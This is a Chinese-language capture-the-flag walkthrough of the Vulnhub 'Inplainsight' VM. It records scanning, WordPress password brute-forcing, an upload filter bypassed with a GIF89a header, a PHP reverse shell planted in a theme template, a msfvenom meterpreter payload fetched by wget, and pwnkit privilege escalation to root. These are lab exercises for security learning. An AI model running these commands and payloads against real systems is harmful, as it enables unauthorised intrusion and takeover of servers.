Vulnhub之Inplainsight靶机详细测试过程及经验教训

这篇具有很好参考价值的文章主要介绍了Vulnhub之Inplainsight靶机详细测试过程及经验教训。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Inplainsight

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:86:38:75      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:f9:29:62      1      60  PCS Systemtechnik GmbH    

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 20:38 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 392d3630aaac5d1601082c5fc56717b4 (RSA)
|   256 b021a7430c928570ff57c6f937dfe5a2 (ECDSA)
|_  256 7399d582878c0abc3d1e8daab169aa35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:F9:29:62 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 IPS Corp
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47934|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Nov 22  2019 ..
-rw-r--r--    1 ftp      ftp           306 Nov 22  2019 todo.txt
226 Directory send OK.
ftp> get todo.txt
local: todo.txt remote: todo.txt
229 Entering Extended Passive Mode (|||24332|)
150 Opening BINARY mode data connection for todo.txt (306 bytes).
100% |********************************************************************************|   306      410.47 KiB/s    00:00 ETA
226 Transfer complete.
306 bytes received in 00:00 (260.98 KiB/s)

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat todo.txt      
mike - please get ride of that worthless wordpress instance! it's a security ris
k.  if you have privilege issues, please ask joe for assitance.

joe - stop leaving backdoors on the system or your access will be removed! y
our rabiit holes aren't enough for these elite cyber hacking types.

- boss person

  1. 用户:mike, joe

  2. 可能有backdoor文件

  3. 目标站点是wordpress?

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,js,html,txt,sh
[+] Timeout:                 10s
===============================================================
2023/04/15 20:56:47 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/info.php             (Status: 200) [Size: 84027]
/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.254/wordpress/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1319837 / 1323366 (99.73%)===============================================================
2023/04/15 20:59:29 Finished
==========================================================

Gobuster工具识别出目录/wordpress,访问该目录,发现页面显示不完整,查看页面源代码,可知需要添加主机名到/etc/hosts文件:inplainsight

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo vim /etc/hosts                                        
[sudo] password for kali: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.254  inplainsight

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -e u,p                                        
________________________________________________________
i] User(s) Identified:

[+] bossperson
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


wpscan工具识别出用户名bossperson,看是否可以破解出密码

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -U bossperson -P /usr/share/wordlists/rockyou.txt 

运行了15分钟,仍然没有破解出密码,暂时放弃这个方向。

接下来看能否扫描出有漏洞的插件?

(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ --plugins-detection mixed

没有识别出有漏洞的插件。

回到默认页面,注意到:



This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.htnl) before continuing to operate your HTTP server.

If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.

存在一个文件/var/www/html/index.htnl

扩展名很奇怪,访问该页面

里面有个动画图片,点击一下,就跳转到另一个页面,可以上传文件

但是当上传shell.php时,返回错误:File is not an image.

用burpsuite拦截请求,看能否通过修改application-type来绕过

在Burpsuite修改应用类型为image/jpeg,未能成功

挡在shell.php头部增加一行:GIF89a

此时返回:File is an image - image/gif.此时页面源代码有注释:


<!--c28tZGV2LXdvcmRwcmVzcw==-->
</body></html>

对其进行解码:

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ echo 'c28tZGV2LXdvcmRwcmVzcw==' | base64 -d                  
so-dev-wordpress     

这应该是另外一个目录,这也就与todo文件中的描述对应起来,因此对该so-dev-wordpress进行扫描

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -e u,p
[i] User(s) Identified:

[+] mike
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

    
(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U mike -P /usr/share/wordlists/rockyou.txt

运行了15分钟,没有破解出密码。

──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress --plugins-detection mixed  

wpscan工具也没有扫描出有漏洞的插件。

那看能不能破解出另外一个用户admin的密码,在感觉没啥希望的时候,运行了5分钟以后得到了密码:

─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
 | Username: admin, Password: admin1

用admin:admin1登录以后才发现mike是普通用户,而admin是管理员,很多情况下wpscan工具扫描出的一个用户是管理员,但是本靶机并非这种情况

将shell.php替换theme editor中的404模板,然后访问4o4.php文件得到shell

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 54968
Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 22:30:48 up  1:58,  0 users,  load average: 0.03, 1.09, 1.87
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@inplainsight:/$ cd /home
cd /home
www-data@inplainsight:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd joe
cd joe
www-data@inplainsight:/home/joe$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 joe  joe  4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 joe  joe   220 May  5  2019 .bash_logout
-rw-r--r-- 1 joe  joe  3.7K May  5  2019 .bashrc
drwx------ 2 joe  joe  4.0K Nov 21  2019 .cache
drwx------ 3 joe  joe  4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 joe  joe   807 May  5  2019 .profile
-rw-rw---- 1 joe  joe    76 Nov 22  2019 journal
www-data@inplainsight:/home/joe$ cd ..
cd ..
www-data@inplainsight:/home$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K Nov 21  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
drwxr-xr-x  4 joe  joe  4.0K Nov 22  2019 joe
drwxr-xr-x  4 mike mike 4.0K Nov 22  2019 mike
www-data@inplainsight:/home$ cd mike
cd mike
www-data@inplainsight:/home/mike$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 mike mike 4.0K Nov 22  2019 .
drwxr-xr-x 4 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx 1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike  220 Nov 21  2019 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Nov 21  2019 .bashrc
drwx------ 2 mike mike 4.0K Nov 21  2019 .cache
drwx------ 3 mike mike 4.0K Nov 21  2019 .gnupg
-rw-r--r-- 1 mike mike  807 Nov 21  2019 .profile

提权

www-data@inplainsight:/var/www/html/so-dev-wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );

/** MySQL database username */
define( 'DB_USER', 'sodevwp' );

/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );


接下里看能不能得到Meterpreter会话

┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes

将escalate.elf上传到目标主机/tmp目录,修改权限,并执行(同时在kali linux启动msfconsole)

ww-data@inplainsight:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-15 22:40:41--  http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’

escalate.elf        100%[===================>]     207  --.-KB/s    in 0s      

2023-04-15 22:40:41 (80.0 MB/s) - ‘escalate.elf’ saved [207/207]

www-data@inplainsight:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
www-data@inplainsight:/tmp$ ./escalate.elf
./escalate.elf

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.206:6666 
[*] Sending stage (1017704 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:50464) at 2023-04-15 22:40:54 -0400

运行Linux suggester寻找是否存在可以用于本地提权的漏洞

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options 

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.56.254 - Collecting local exploits for x86/linux...
[*] 192.168.56.254 - 181 exploit checks are being tried...
[+] 192.168.56.254 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.254 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.254 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.254 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 56 / 56
[*] 192.168.56.254 - Valid modules for session 1:
============================

 #   Name                                                               Potentially Vulnerable?  Check Result
 -   ----                                                               -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                Yes                      The target is vulnerable.
 2   exploit/linux/local/netfilter_priv_esc_ipv4                        Yes                      The target appears to be vulnerable.                                                                                                                       
 3   exploit/linux/local/pkexec                                         Yes                      The service is running, but could not be validated.                                                                          
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.56.206:8888 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.sfhgqnd
[+] The target is vulnerable.
[*] Writing '/tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.dmjtawxsqqdj
[*] Sending stage (3045348 bytes) to 192.168.56.254
[+] Deleted /tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so
[+] Deleted /tmp/.dmjtawxsqqdj/.eorecnkoiqu
[+] Deleted /tmp/.dmjtawxsqqdj
[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:52522) at 2023-04-15 22:45:20 -0400
meterpreter > shell
Process 2293 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------  5 root root 4.0K Dec  2  2019 .
drwxr-xr-x 19 root root 4.0K Nov 21  2019 ..
lrwxrwxrwx  1 root root    9 Nov 22  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Nov 21  2019 .cache
drwx------  3 root root 4.0K Nov 21  2019 .gnupg
-rw-------  1 root root  472 Nov 21  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
drwxr-xr-x  2 root root 4.0K Nov 22  2019 .vim
-rw-------  1 root root  11K Dec  2  2019 .viminfo
-rw-r--r--  1 root root  408 Nov 22  2019 flag.txt
cat flag.txt

                                          __          
  ____  ____   ____    ________________ _/  |_  ______
_/ ___\/  _ \ /    \  / ___\_  __ \__  \\   __\/  ___/
\  \__(  <_> )   |  \/ /_/  >  | \// __ \|  |  \___ \ 
 \___  >____/|___|  /\___  /|__|  (____  /__| /____  >
     \/           \//_____/            \/          \/ 

easy right? thanks for playing.

feel free to leave feedback with me @bzyo_


成功提权并得到root flag

经验教训

  1. 在破解so-dev-wp的wordpress站点用户密码时,按照以往的规律,被wpscan工具识别的第一个用户是管理员,因此就重点破解第一个用户名的密码mike,好在在破解第2个用户admin时,没有花费太长时间就破解出密码。

  2. 本靶机的第一个突破点是,默认页面中有个不寻常的文件名,然后访问你该文件时,需要注意点击一下图片,否则会错过整个渗透的机会文章来源地址https://www.toymoban.com/news/detail-415183.html

到了这里,关于Vulnhub之Inplainsight靶机详细测试过程及经验教训的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Maskcrafter靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。 目标主机没有NFS共享目录。 Kali Linux访问80端口,为用户登录界面,用admin\\\' or 1=1 -- 即可轻松绕过。 登录成功后,在页面源代码中有注释: 访问

    2023年04月10日
    浏览(29)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(41)
  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(32)
  • Vulnhub之Gain Power靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http) nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。 但是图片分析没有得到任何有意的结果。 假设用户

    2024年02月02日
    浏览(50)
  • Vulnhub之Grotesque3靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 浏览器访问80端口,返回页面图片中有提示md5? 可能指的是目录字典需要md5加密? 然后去掉每行结果的\\\'-\\\' 然后删除空格: 利用gobuster工具发现了文件 但是

    2023年04月27日
    浏览(34)
  • Vulnhub之Hacker Fest 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(37)
  • Vulnhub之Harrison靶机详细测试过程(提权成功)

    作者:jason huawen 名称: SP: harrison 地址: 利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba) enum4linux识别出用户名harrison 没那么容易? 虽然得到了shell,但是这是受限的shell 用-t选项指定不同的shell没能逃脱

    2023年04月23日
    浏览(37)
  • Vulnhub之KB Vuln 3靶机详细测试过程

    作者:jason huawen 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba) 通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。 enum4linux工具识别出目标主机存在用户名heisenbe

    2023年04月12日
    浏览(41)
  • Vulnhub之Gears of War靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 smb服务不允许上传文件 将共享目录的文件下载到Kali Linux到本地 利用enum4linux工具识别目标主机存在marcus用户 john没有破解出来。 SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典 这样就根据作者提示的

    2024年02月02日
    浏览(34)
  • Vulnhub之Funbox 4靶机详细测试过程(提权成功)

    名称:Funbox: CTF URL: 将靶机导入 VirtualBox。配置其网卡为主机模式配置。启动 Kali Linux 和靶机。 内置 netdiscovery工具 可以将靶机的 IP 地址识别为 192.168.56.150。 利用NMAP工具进行全端口扫描: NMAP扫描结果表明目标主机有4个开放端口: 22(ssh),80(http),110(pop3),143(imap) 其实作者给出了

    2024年02月03日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包